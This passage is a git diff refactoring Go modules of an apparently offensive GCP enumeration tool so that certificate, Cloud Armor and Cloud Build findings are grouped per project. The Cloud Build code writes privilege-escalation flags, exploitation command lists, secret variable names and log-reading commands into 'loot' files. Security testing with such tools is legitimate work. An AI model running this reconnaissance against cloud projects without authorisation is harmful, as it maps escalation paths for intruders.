*CertManagerModule) writeOutput(ctx context.Context, logger internal.Log }) } - for _, cert := range m.SSLCertificates { + for _, cert := range sslCerts { wildcard := "No" if cert.Wildcard { wildcard = "Yes" @@ -320,68 +370,130 @@ func (m *CertManagerModule) writeOutput(ctx context.Context, logger internal.Log }) } - if len(body) > 0 { - tables = append(tables, internal.TableFile{ + return body +} + +func (m *CertManagerModule) certMapsToTableBody(certMaps []certmanagerservice.CertificateMap) [][]string { + var body [][]string + for _, certMap := range certMaps { + body = append(body, []string{ + m.GetProjectName(certMap.ProjectID), + certMap.ProjectID, + certMap.Name, + certMap.Location, + fmt.Sprintf("%d", certMap.EntryCount), + strings.Join(certMap.Certificates, ", "), + }) + } + return body +} + +func (m *CertManagerModule) buildTablesForProject(projectID string) []internal.TableFile { + var tableFiles []internal.TableFile + + certs := m.ProjectCertificates[projectID] + sslCerts := m.ProjectSSLCertificates[projectID] + if len(certs) > 0 || len(sslCerts) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ Name: "certificates", - Header: header, - Body: body, + Header: m.getCertificatesHeader(), + Body: m.certsToTableBody(certs, sslCerts), + }) + } + + if certMaps, ok := m.ProjectCertMaps[projectID]; ok && len(certMaps) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "certificate-maps", + Header: m.getCertMapsHeader(), + Body: m.certMapsToTableBody(certMaps), }) } - // Certificate maps table - if len(m.CertMaps) > 0 { - mapHeader := []string{"Project Name", "Project ID", "Name", "Location", "Entries", "Certificates"} - var mapBody [][]string - - for _, certMap := range m.CertMaps { - mapBody = append(mapBody, []string{ - m.GetProjectName(certMap.ProjectID), - certMap.ProjectID, - certMap.Name, - certMap.Location, - fmt.Sprintf("%d", certMap.EntryCount), - strings.Join(certMap.Certificates, ", "), - }) + return tableFiles +} + +func (m *CertManagerModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + // Get all project IDs that have data + projectIDs := make(map[string]bool) + for projectID := range m.ProjectCertificates { + projectIDs[projectID] = true + } + for projectID := range m.ProjectSSLCertificates { + projectIDs[projectID] = true + } + for projectID := range m.ProjectCertMaps { + projectIDs[projectID] = true + } + + for projectID := range projectIDs { + tableFiles := m.buildTablesForProject(projectID) + + var lootFiles []internal.LootFile + if projectLoot, ok := m.LootMap[projectID]; ok { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + lootFiles = append(lootFiles, *loot) + } + } } + outputData.ProjectLevelData[projectID] = CertManagerOutput{Table: tableFiles, Loot: lootFiles} + } + + pathBuilder := m.BuildPathBuilder() + + err := internal.HandleHierarchicalOutputSmart("gcp", m.Format, m.Verbosity, m.WrapTable, pathBuilder, outputData) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_CERTMANAGER_MODULE_NAME) + } +} + +func (m *CertManagerModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + allCerts := m.getAllCertificates() + allSSLCerts := m.getAllSSLCertificates() + allCertMaps := m.getAllCertMaps() + + var tables []internal.TableFile + + if len(allCerts) > 0 || len(allSSLCerts) > 0 { + tables = append(tables, internal.TableFile{ + Name: "certificates", + Header: m.getCertificatesHeader(), + Body: m.certsToTableBody(allCerts, allSSLCerts), + }) + } + + if len(allCertMaps) > 0 { tables = append(tables, internal.TableFile{ Name: "certificate-maps", - Header: mapHeader, - Body: mapBody, + Header: m.getCertMapsHeader(), + Body: m.certMapsToTableBody(allCertMaps), }) } - // Collect loot files var lootFiles []internal.LootFile - for _, loot := range m.LootMap { - if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { - lootFiles = append(lootFiles, *loot) + for _, projectLoot := range m.LootMap { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + lootFiles = append(lootFiles, *loot) + } } } - output := CertManagerOutput{ - Table: tables, - Loot: lootFiles, - } + output := CertManagerOutput{Table: tables, Loot: lootFiles} - // Build scopeNames using GetProjectName scopeNames := make([]string, len(m.ProjectIDs)) for i, projectID := range m.ProjectIDs { scopeNames[i] = m.GetProjectName(projectID) } - err := internal.HandleOutputSmart( - "gcp", - m.Format, - m.OutputDirectory, - m.Verbosity, - m.WrapTable, - "project", - m.ProjectIDs, - scopeNames, - m.Account, - output, - ) + err := internal.HandleOutputSmart("gcp", m.Format, m.OutputDirectory, m.Verbosity, m.WrapTable, + "project", m.ProjectIDs, scopeNames, m.Account, output) if err != nil { logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_CERTMANAGER_MODULE_NAME) m.CommandCounter.Error++ diff --git a/gcp/commands/cloudarmor.go b/gcp/commands/cloudarmor.go index 455fd202..2a2591ac 100644 --- a/gcp/commands/cloudarmor.go +++ b/gcp/commands/cloudarmor.go @@ -43,9 +43,9 @@ What this module finds: type CloudArmorModule struct { gcpinternal.BaseGCPModule - Policies []cloudarmorservice.SecurityPolicy - UnprotectedLBs map[string][]string // projectID -> LB names - LootMap map[string]*internal.LootFile + ProjectPolicies map[string][]cloudarmorservice.SecurityPolicy // projectID -> policies + UnprotectedLBs map[string][]string // projectID -> LB names + LootMap map[string]map[string]*internal.LootFile // projectID -> loot files mu sync.Mutex } @@ -70,19 +70,25 @@ func runGCPCloudArmorCommand(cmd *cobra.Command, args []string) { } module := &CloudArmorModule{ - BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), - Policies: []cloudarmorservice.SecurityPolicy{}, - UnprotectedLBs: make(map[string][]string), - LootMap: make(map[string]*internal.LootFile), + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ProjectPolicies: make(map[string][]cloudarmorservice.SecurityPolicy), + UnprotectedLBs: make(map[string][]string), + LootMap: make(map[string]map[string]*internal.LootFile), } - - module.initializeLootFiles() module.Execute(cmdCtx.Ctx, cmdCtx.Logger) } // ------------------------------ // Module Execution // ------------------------------ +func (m *CloudArmorModule) getAllPolicies() []cloudarmorservice.SecurityPolicy { + var all []cloudarmorservice.SecurityPolicy + for _, policies := range m.ProjectPolicies { + all = append(all, policies...) + } + return all +} + func (m *CloudArmorModule) Execute(ctx context.Context, logger internal.Logger) { m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_CLOUDARMOR_MODULE_NAME, m.processProject) @@ -92,21 +98,22 @@ func (m *CloudArmorModule) Execute(ctx context.Context, logger internal.Logger) totalUnprotected += len(lbs) } - if len(m.Policies) == 0 && totalUnprotected == 0 { + allPolicies := m.getAllPolicies() + if len(allPolicies) == 0 && totalUnprotected == 0 { logger.InfoM("No Cloud Armor policies found", globals.GCP_CLOUDARMOR_MODULE_NAME) return } // Count policies with weaknesses weakPolicies := 0 - for _, policy := range m.Policies { + for _, policy := range allPolicies { if len(policy.Weaknesses) > 0 { weakPolicies++ } } logger.SuccessM(fmt.Sprintf("Found %d security policy(ies), %d with weaknesses, %d unprotected LB(s)", - len(m.Policies), weakPolicies, totalUnprotected), globals.GCP_CLOUDARMOR_MODULE_NAME) + len(allPolicies), weakPolicies, totalUnprotected), globals.GCP_CLOUDARMOR_MODULE_NAME) if totalUnprotected > 0 { logger.InfoM(fmt.Sprintf("[MEDIUM] %d load balancer(s) have no Cloud Armor protection", totalUnprotected), globals.GCP_CLOUDARMOR_MODULE_NAME) @@ -123,6 +130,17 @@ func (m *CloudArmorModule) processProject(ctx context.Context, projectID string, logger.InfoM(fmt.Sprintf("Checking Cloud Armor in project: %s", projectID), globals.GCP_CLOUDARMOR_MODULE_NAME) } + m.mu.Lock() + // Initialize loot for this project + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + m.LootMap[projectID]["cloudarmor-details"] = &internal.LootFile{ + Name: "cloudarmor-details", + Contents: "# Cloud Armor Details\n# Generated by CloudFox\n\n", + } + } + m.mu.Unlock() + svc := cloudarmorservice.New() // Get security policies @@ -142,13 +160,13 @@ func (m *CloudArmorModule) processProject(ctx context.Context, projectID string, } m.mu.Lock() - m.Policies = append(m.Policies, policies...) + m.ProjectPolicies[projectID] = policies if len(unprotectedLBs) > 0 { m.UnprotectedLBs[projectID] = unprotectedLBs } for _, policy := range policies { - m.addPolicyToLoot(policy) + m.addPolicyToLoot(projectID, policy) } for _, lb := range unprotectedLBs { m.addUnprotectedLBToLoot(projectID, lb) @@ -159,14 +177,12 @@ func (m *CloudArmorModule) processProject(ctx context.Context, projectID string, // ------------------------------ // Loot File Management // ------------------------------ -func (m *CloudArmorModule) initializeLootFiles() { - m.LootMap["cloudarmor-details"] = &internal.LootFile{ - Name: "cloudarmor-details", - Contents: "# Cloud Armor Details\n# Generated by CloudFox\n\n", +func (m *CloudArmorModule) addPolicyToLoot(projectID string, policy cloudarmorservice.SecurityPolicy) { + lootFile := m.LootMap[projectID]["cloudarmor-details"] + if lootFile == nil { + return } -} -func (m *CloudArmorModule) addPolicyToLoot(policy cloudarmorservice.SecurityPolicy) { // Build flags for special attributes var flags []string if len(policy.Weaknesses) > 0 { @@ -188,7 +204,7 @@ func (m *CloudArmorModule) addPolicyToLoot(policy cloudarmorservice.SecurityPoli resources = strings.Join(policy.AttachedResources, ", ") } - m.LootMap["cloudarmor-details"].Contents += fmt.Sprintf( + lootFile.Contents += fmt.Sprintf( "# %s%s\n"+ "Project: %s | Type: %s\n"+ "Rules: %d | Adaptive Protection: %s\n"+ @@ -201,28 +217,28 @@ func (m *CloudArmorModule) addPolicyToLoot(policy cloudarmorservice.SecurityPoli // Add weaknesses if any if len(policy.Weaknesses) > 0 { - m.LootMap["cloudarmor-details"].Contents += "Weaknesses:\n" + lootFile.Contents += "Weaknesses:\n" for _, weakness := range policy.Weaknesses { - m.LootMap["cloudarmor-details"].Contents += fmt.Sprintf(" - %s\n", weakness) + lootFile.Contents += fmt.Sprintf(" - %s\n", weakness) } } // Add rules if len(policy.Rules) > 0 { - m.LootMap["cloudarmor-details"].Contents += "Rules:\n" + lootFile.Contents += "Rules:\n" for _, rule := range policy.Rules { preview := "" if rule.Preview { preview = " [PREVIEW]" } - m.LootMap["cloudarmor-details"].Contents += fmt.Sprintf( + lootFile.Contents += fmt.Sprintf( " - Priority %d: %s%s\n"+ " Match: %s\n", rule.Priority, rule.Action, preview, rule.Match, ) if rule.RateLimitConfig != nil { - m.LootMap["cloudarmor-details"].Contents += fmt.Sprintf( + lootFile.Contents += fmt.Sprintf( " Rate Limit: %d requests per %d seconds\n", rule.RateLimitConfig.ThresholdCount, rule.RateLimitConfig.IntervalSec, @@ -231,123 +247,181 @@ func (m *CloudArmorModule) addPolicyToLoot(policy cloudarmorservice.SecurityPoli } } - m.LootMap["cloudarmor-details"].Contents += "\n" + lootFile.Contents += "\n" } func (m *CloudArmorModule) addUnprotectedLBToLoot(projectID, lbName string) { - m.LootMap["cloudarmor-details"].Contents += fmt.Sprintf( - "# %s [UNPROTECTED]\n"+ - "Project: %s\n"+ - "No Cloud Armor policy attached\n\n", - lbName, projectID, - ) + if lootFile := m.LootMap[projectID]["cloudarmor-details"]; lootFile != nil { + lootFile.Contents += fmt.Sprintf( + "# %s [UNPROTECTED]\n"+ + "Project: %s\n"+ + "No Cloud Armor policy attached\n\n", + lbName, projectID, + ) + } } // ------------------------------ // Output Generation // ------------------------------ func (m *CloudArmorModule) writeOutput(ctx context.Context, logger internal.Logger) { - var tables []internal.TableFile + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} - // Security policies table - if len(m.Policies) > 0 { - header := []string{"Project Name", "Project ID", "Name", "Type", "Rules", "Attached Resources", "Adaptive Protection"} - var body [][]string +func (m *CloudArmorModule) getPoliciesHeader() []string { + return []string{"Project Name", "Project ID", "Name", "Type", "Rules", "Attached Resources", "Adaptive Protection"} +} - for _, policy := range m.Policies { - adaptive := "No" - if policy.AdaptiveProtection { - adaptive = "Yes" - } +func (m *CloudArmorModule) getUnprotectedLBsHeader() []string { + return []string{"Project Name", "Project ID", "Backend Service"} +} - resources := "-" - if len(policy.AttachedResources) > 0 { - resources = strings.Join(policy.AttachedResources, ", ") - } +func (m *CloudArmorModule) policiesToTableBody(policies []cloudarmorservice.SecurityPolicy) [][]string { + var body [][]string + for _, policy := range policies { + adaptive := "No" + if policy.AdaptiveProtection { + adaptive = "Yes" + } - body = append(body, []string{ - m.GetProjectName(policy.ProjectID), - policy.ProjectID, - policy.Name, - policy.Type, - fmt.Sprintf("%d", policy.RuleCount), - resources, - adaptive, - }) + resources := "-" + if len(policy.AttachedResources) > 0 { + resources = strings.Join(policy.AttachedResources, ", ") } - tables = append(tables, internal.TableFile{ + body = append(body, []string{ + m.GetProjectName(policy.ProjectID), + policy.ProjectID, + policy.Name, + policy.Type, + fmt.Sprintf("%d", policy.RuleCount), + resources, + adaptive, + }) + } + return body +} + +func (m *CloudArmorModule) unprotectedLBsToTableBody(projectID string, lbs []string) [][]string { + var body [][]string + for _, lb := range lbs { + body = append(body, []string{ + m.GetProjectName(projectID), + projectID, + lb, + }) + } + return body +} + +func (m *CloudArmorModule) buildTablesForProject(projectID string) []internal.TableFile { + var tableFiles []internal.TableFile + + if policies, ok := m.ProjectPolicies[projectID]; ok && len(policies) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ Name: "security-policies", - Header: header, - Body: body, + Header: m.getPoliciesHeader(), + Body: m.policiesToTableBody(policies), }) } - // Unprotected backend services table - var unprotectedList []struct { - ProjectID string - LBName string + if lbs, ok := m.UnprotectedLBs[projectID]; ok && len(lbs) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "unprotected-backend-services", + Header: m.getUnprotectedLBsHeader(), + Body: m.unprotectedLBsToTableBody(projectID, lbs), + }) } - for projectID, lbs := range m.UnprotectedLBs { - for _, lb := range lbs { - unprotectedList = append(unprotectedList, struct { - ProjectID string - LBName string - }{projectID, lb}) - } + + return tableFiles +} + +func (m *CloudArmorModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + // Get all project IDs that have data + projectIDs := make(map[string]bool) + for projectID := range m.ProjectPolicies { + projectIDs[projectID] = true + } + for projectID := range m.UnprotectedLBs { + projectIDs[projectID] = true } - if len(unprotectedList) > 0 { - header := []string{"Project Name", "Project ID", "Backend Service"} - var body [][]string + for projectID := range projectIDs { + tableFiles := m.buildTablesForProject(projectID) - for _, item := range unprotectedList { - body = append(body, []string{ - m.GetProjectName(item.ProjectID), - item.ProjectID, - item.LBName, - }) + var lootFiles []internal.LootFile + if projectLoot, ok := m.LootMap[projectID]; ok { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + lootFiles = append(lootFiles, *loot) + } + } } + outputData.ProjectLevelData[projectID] = CloudArmorOutput{Table: tableFiles, Loot: lootFiles} + } + + pathBuilder := m.BuildPathBuilder() + + err := internal.HandleHierarchicalOutputSmart("gcp", m.Format, m.Verbosity, m.WrapTable, pathBuilder, outputData) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_CLOUDARMOR_MODULE_NAME) + } +} + +func (m *CloudArmorModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + var tables []internal.TableFile + + allPolicies := m.getAllPolicies() + if len(allPolicies) > 0 { + tables = append(tables, internal.TableFile{ + Name: "security-policies", + Header: m.getPoliciesHeader(), + Body: m.policiesToTableBody(allPolicies), + }) + } + + // Build unprotected LBs table from all projects + var allUnprotectedBody [][]string + for projectID, lbs := range m.UnprotectedLBs { + allUnprotectedBody = append(allUnprotectedBody, m.unprotectedLBsToTableBody(projectID, lbs)...) + } + if len(allUnprotectedBody) > 0 { tables = append(tables, internal.TableFile{ Name: "unprotected-backend-services", - Header: header, - Body: body, + Header: m.getUnprotectedLBsHeader(), + Body: allUnprotectedBody, }) } - // Collect loot files var lootFiles []internal.LootFile - for _, loot := range m.LootMap { - if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { - lootFiles = append(lootFiles, *loot) + for _, projectLoot := range m.LootMap { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + lootFiles = append(lootFiles, *loot) + } } } - output := CloudArmorOutput{ - Table: tables, - Loot: lootFiles, - } + output := CloudArmorOutput{Table: tables, Loot: lootFiles} scopeNames := make([]string, len(m.ProjectIDs)) - for i, projectID := range m.ProjectIDs { - scopeNames[i] = m.GetProjectName(projectID) - } - - err := internal.HandleOutputSmart( - "gcp", - m.Format, - m.OutputDirectory, - m.Verbosity, - m.WrapTable, - "project", - m.ProjectIDs, - scopeNames, - m.Account, - output, - ) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + + err := internal.HandleOutputSmart("gcp", m.Format, m.OutputDirectory, m.Verbosity, m.WrapTable, + "project", m.ProjectIDs, scopeNames, m.Account, output) if err != nil { logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_CLOUDARMOR_MODULE_NAME) - m.CommandCounter.Error++ } } diff --git a/gcp/commands/cloudbuild.go b/gcp/commands/cloudbuild.go index daedbc48..46e6fe1c 100644 --- a/gcp/commands/cloudbuild.go +++ b/gcp/commands/cloudbuild.go @@ -35,11 +35,12 @@ type CloudBuildModule struct { gcpinternal.BaseGCPModule // Module-specific fields - Triggers []cloudbuildservice.TriggerInfo - Builds []cloudbuildservice.BuildInfo - SecurityAnalysis []cloudbuildservice.TriggerSecurityAnalysis - LootMap map[string]*internal.LootFile - mu sync.Mutex + ProjectTriggers map[string][]cloudbuildservice.TriggerInfo // projectID -> triggers + ProjectBuilds map[string][]cloudbuildservice.BuildInfo // projectID -> builds + ProjectSecurityAnalysis map[string][]cloudbuildservice.TriggerSecurityAnalysis // projectID -> analysis + LootMap map[string]map[string]*internal.LootFile // projectID -> loot files + PrivescCache *gcpinternal.PrivescCache // Cached privesc analysis results + mu sync.Mutex } // ------------------------------ @@ -63,14 +64,13 @@ func runGCPCloudBuildCommand(cmd *cobra.Command, args []string) { } module := &CloudBuildModule{ - BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), - Triggers: []cloudbuildservice.TriggerInfo{}, - Builds: []cloudbuildservice.BuildInfo{}, - SecurityAnalysis: []cloudbuildservice.TriggerSecurityAnalysis{}, - LootMap: make(map[string]*internal.LootFile), + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ProjectTriggers: make(map[string][]cloudbuildservice.TriggerInfo), + ProjectBuilds: make(map[string][]cloudbuildservice.BuildInfo), + ProjectSecurityAnalysis: make(map[string][]cloudbuildservice.TriggerSecurityAnalysis), + LootMap: make(map[string]map[string]*internal.LootFile), } - module.initializeLootFiles() module.Execute(cmdCtx.Ctx, cmdCtx.Logger) } @@ -78,19 +78,41 @@ func runGCPCloudBuildCommand(cmd *cobra.Command, args []string) { // Module Execution // ------------------------------ func (m *CloudBuildModule) Execute(ctx context.Context, logger internal.Logger) { + // Get privesc cache from context (populated by --with-privesc flag or all-checks) + m.PrivescCache = gcpinternal.GetPrivescCacheFromContext(ctx) + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_CLOUDBUILD_MODULE_NAME, m.processProject) - if len(m.Triggers) == 0 && len(m.Builds) == 0 { + allTriggers := m.getAllTriggers() + allBuilds := m.getAllBuilds() + + if len(allTriggers) == 0 && len(allBuilds) == 0 { logger.InfoM("No Cloud Build triggers or builds found", globals.GCP_CLOUDBUILD_MODULE_NAME) return } logger.SuccessM(fmt.Sprintf("Found %d trigger(s), %d recent build(s)", - len(m.Triggers), len(m.Builds)), globals.GCP_CLOUDBUILD_MODULE_NAME) + len(allTriggers), len(allBuilds)), globals.GCP_CLOUDBUILD_MODULE_NAME) m.writeOutput(ctx, logger) } +func (m *CloudBuildModule) getAllTriggers() []cloudbuildservice.TriggerInfo { + var all []cloudbuildservice.TriggerInfo + for _, triggers := range m.ProjectTriggers { + all = append(all, triggers...) + } + return all +} + +func (m *CloudBuildModule) getAllBuilds() []cloudbuildservice.BuildInfo { + var all []cloudbuildservice.BuildInfo + for _, builds := range m.ProjectBuilds { + all = append(all, builds...) + } + return all +} + // ------------------------------ // Project Processor // ------------------------------ @@ -118,20 +140,31 @@ func (m *CloudBuildModule) processProject(ctx context.Context, projectID string, } m.mu.Lock() - m.Triggers = append(m.Triggers, triggers...) - m.Builds = append(m.Builds, builds...) + m.ProjectTriggers[projectID] = triggers + m.ProjectBuilds[projectID] = builds + + // Initialize loot for this project + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + m.LootMap[projectID]["cloudbuild-details"] = &internal.LootFile{ + Name: "cloudbuild-details", + Contents: "# Cloud Build Details\n# Generated by CloudFox\n\n", + } + } + var projectAnalysis []cloudbuildservice.TriggerSecurityAnalysis for _, trigger := range triggers { - m.addTriggerToLoot(trigger) + m.addTriggerToLoot(projectID, trigger) // Perform security analysis analysis := cbSvc.AnalyzeTriggerForPrivesc(trigger, projectID) - m.SecurityAnalysis = append(m.SecurityAnalysis, analysis) - m.addSecurityAnalysisToLoot(analysis) + projectAnalysis = append(projectAnalysis, analysis) + m.addSecurityAnalysisToLoot(projectID, analysis) } + m.ProjectSecurityAnalysis[projectID] = projectAnalysis // Add build step analysis to loot for _, build := range builds { - m.addBuildToLoot(build) + m.addBuildToLoot(projectID, build) } m.mu.Unlock() } @@ -139,14 +172,12 @@ func (m *CloudBuildModule) processProject(ctx context.Context, projectID string, // ------------------------------ // Loot File Management // ------------------------------ -func (m *CloudBuildModule) initializeLootFiles() { - m.LootMap["cloudbuild-details"] = &internal.LootFile{ - Name: "cloudbuild-details", - Contents: "# Cloud Build Details\n# Generated by CloudFox\n\n", +func (m *CloudBuildModule) addTriggerToLoot(projectID string, trigger cloudbuildservice.TriggerInfo) { + lootFile := m.LootMap[projectID]["cloudbuild-details"] + if lootFile == nil { + return } -} -func (m *CloudBuildModule) addTriggerToLoot(trigger cloudbuildservice.TriggerInfo) { // Build flags for special attributes var flags []string if trigger.PrivescPotential { @@ -171,7 +202,7 @@ func (m *CloudBuildModule) addTriggerToLoot(trigger cloudbuildservice.TriggerInf branchTag = trigger.TagName } - m.LootMap["cloudbuild-details"].Contents += fmt.Sprintf( + lootFile.Contents += fmt.Sprintf( "# %s (%s)%s\n"+ "Project: %s\n"+ "Source: %s - %s\n"+ @@ -185,24 +216,34 @@ func (m *CloudBuildModule) addTriggerToLoot(trigger cloudbuildservice.TriggerInf ) } -func (m *CloudBuildModule) addSecurityAnalysisToLoot(analysis cloudbuildservice.TriggerSecurityAnalysis) { +func (m *CloudBuildModule) addSecurityAnalysisToLoot(projectID string, analysis cloudbuildservice.TriggerSecurityAnalysis) { + lootFile := m.LootMap[projectID]["cloudbuild-details"] + if lootFile == nil { + return + } + // Add exploitation commands if available if len(analysis.ExploitCommands) > 0 { - m.LootMap["cloudbuild-details"].Contents += "Exploitation:\n" + lootFile.Contents += "Exploitation:\n" for _, cmd := range analysis.ExploitCommands { - m.LootMap["cloudbuild-details"].Contents += fmt.Sprintf(" %s\n", cmd) + lootFile.Contents += fmt.Sprintf(" %s\n", cmd) } } - m.LootMap["cloudbuild-details"].Contents += "\n" + lootFile.Contents += "\n" } -func (m *CloudBuildModule) addBuildToLoot(build cloudbuildservice.BuildInfo) { +func (m *CloudBuildModule) addBuildToLoot(projectID string, build cloudbuildservice.BuildInfo) { + lootFile := m.LootMap[projectID]["cloudbuild-details"] + if lootFile == nil { + return + } + buildID := build.ID if len(buildID) > 12 { buildID = buildID[:12] } - m.LootMap["cloudbuild-details"].Contents += fmt.Sprintf( + lootFile.Contents += fmt.Sprintf( "# Build: %s\n"+ "Project: %s | Status: %s\n"+ "Trigger: %s | Source: %s\n", @@ -213,7 +254,7 @@ func (m *CloudBuildModule) addBuildToLoot(build cloudbuildservice.BuildInfo) { // Log location if build.LogsBucket != "" { - m.LootMap["cloudbuild-details"].Contents += fmt.Sprintf( + lootFile.Contents += fmt.Sprintf( "Logs: gsutil cat %s/log-%s.txt\n", build.LogsBucket, build.ID, ) @@ -221,21 +262,41 @@ func (m *CloudBuildModule) addBuildToLoot(build cloudbuildservice.BuildInfo) { // Secret environment variables if len(build.SecretEnvVars) > 0 { - m.LootMap["cloudbuild-details"].Contents += "Secret Env Vars:\n" + lootFile.Contents += "Secret Env Vars:\n" for _, secret := range build.SecretEnvVars { - m.LootMap["cloudbuild-details"].Contents += fmt.Sprintf(" - %s\n", secret) + lootFile.Contents += fmt.Sprintf(" - %s\n", secret) } } - m.LootMap["cloudbuild-details"].Contents += "\n" + lootFile.Contents += "\n" } // ------------------------------ // Output Generation // ------------------------------ func (m *CloudBuildModule) writeOutput(ctx context.Context, logger internal.Logger) { - // Triggers table - triggersHeader := []string{ + // Log privesc count + privescCount := 0 + for _, triggers := range m.ProjectTriggers { + for _, trigger := range triggers { + if trigger.PrivescPotential { + privescCount++ + } + } + } + if privescCount > 0 { + logger.InfoM(fmt.Sprintf("[PENTEST] Found %d trigger(s) with privilege escalation potential!", privescCount), globals.GCP_CLOUDBUILD_MODULE_NAME) + } + + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +func (m *CloudBuildModule) getTriggersHeader() []string { + return []string{ "Project Name", "Project ID", "Name", @@ -244,22 +305,35 @@ func (m *CloudBuildModule) writeOutput(ctx context.Context, logger internal.Logg "Branch/Tag", "Config File", "Service Account", + "Priv Esc", "Disabled", "Privesc Potential", } +} - var triggersBody [][]string - privescCount := 0 - for _, trigger := range m.Triggers { +func (m *CloudBuildModule) getBuildsHeader() []string { + return []string{ + "Project Name", + "Project ID", + "ID", + "Status", + "Trigger", + "Source", + "Created", + } +} + +func (m *CloudBuildModule) triggersToTableBody(triggers []cloudbuildservice.TriggerInfo) [][]string { + var body [][]string + for _, trigger := range triggers { disabled := "No" if trigger.Disabled { disabled = "Yes" } - privesc := "No" + privescPotential := "No" if trigger.PrivescPotential { - privesc = "Yes" - privescCount++ + privescPotential = "Yes" } branchTag := trigger.BranchName @@ -272,7 +346,17 @@ func (m *CloudBuildModule) writeOutput(ctx context.Context, logger internal.Logg sa = "(default)" } - triggersBody = append(triggersBody, []string{ + // Check privesc for the service account + privEsc := "-" + if m.PrivescCache != nil && m.PrivescCache.IsPopulated() { + if sa != "(default)" && sa != "" { + privEsc = m.PrivescCache.GetPrivescSummary(sa) + } else { + privEsc = "No" + } + } + + body = append(body, []string{ m.GetProjectName(trigger.ProjectID), trigger.ProjectID, trigger.Name, @@ -281,29 +365,22 @@ func (m *CloudBuildModule) writeOutput(ctx context.Context, logger internal.Logg branchTag, trigger.Filename, sa, + privEsc, disabled, - privesc, + privescPotential, }) } + return body +} - // Builds table - buildsHeader := []string{ - "Project Name", - "Project ID", - "ID", - "Status", - "Trigger", - "Source", - "Created", - } - - var buildsBody [][]string - for _, build := range m.Builds { +func (m *CloudBuildModule) buildsToTableBody(builds []cloudbuildservice.BuildInfo) [][]string { + var body [][]string + for _, build := range builds { buildID := build.ID if len(buildID) > 12 { buildID = buildID[:12] } - buildsBody = append(buildsBody, []string{ + body = append(body, []string{ m.GetProjectName(build.ProjectID), build.ProjectID, buildID, @@ -313,35 +390,98 @@ func (m *CloudBuildModule) writeOutput(ctx context.Context, logger internal.Logg build.CreateTime, }) } + return body +} - // Collect loot files - var lootFiles []internal.LootFile - for _, loot := range m.LootMap { - if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { - lootFiles = append(lootFiles, *loot) +func (m *CloudBuildModule) buildTablesForProject(projectID string) []internal.TableFile { + var tableFiles []internal.TableFile + + if triggers, ok := m.ProjectTriggers[projectID]; ok && len(triggers) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "cloudbuild-triggers", + Header: m.getTriggersHeader(), + Body: m.triggersToTableBody(triggers), + }) + } + + if builds, ok := m.ProjectBuilds[projectID]; ok && len(builds) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "cloudbuild-builds", + Header: m.getBuildsHeader(), + Body: m.buildsToTableBody(builds), + }) + } + + return tableFiles +} + +func (m *CloudBuildModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + // Get all project IDs that have data + projectIDs := make(map[string]bool) + for projectID := range m.ProjectTriggers { + projectIDs[projectID] = true + } + for projectID := range m.ProjectBuilds { + projectIDs[projectID] = true + } + + for projectID := range projectIDs { + tableFiles := m.buildTablesForProject(projectID) + + var lootFiles []internal.LootFile + if projectLoot, ok := m.LootMap[projectID]; ok { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + lootFiles = append(lootFiles, *loot) + } + } } + + outputData.ProjectLevelData[projectID] = CloudBuildOutput{Table: tableFiles, Loot: lootFiles} } + pathBuilder := m.BuildPathBuilder() + + err := internal.HandleHierarchicalOutputSmart("gcp", m.Format, m.Verbosity, m.WrapTable, pathBuilder, outputData) + if err != nil { + 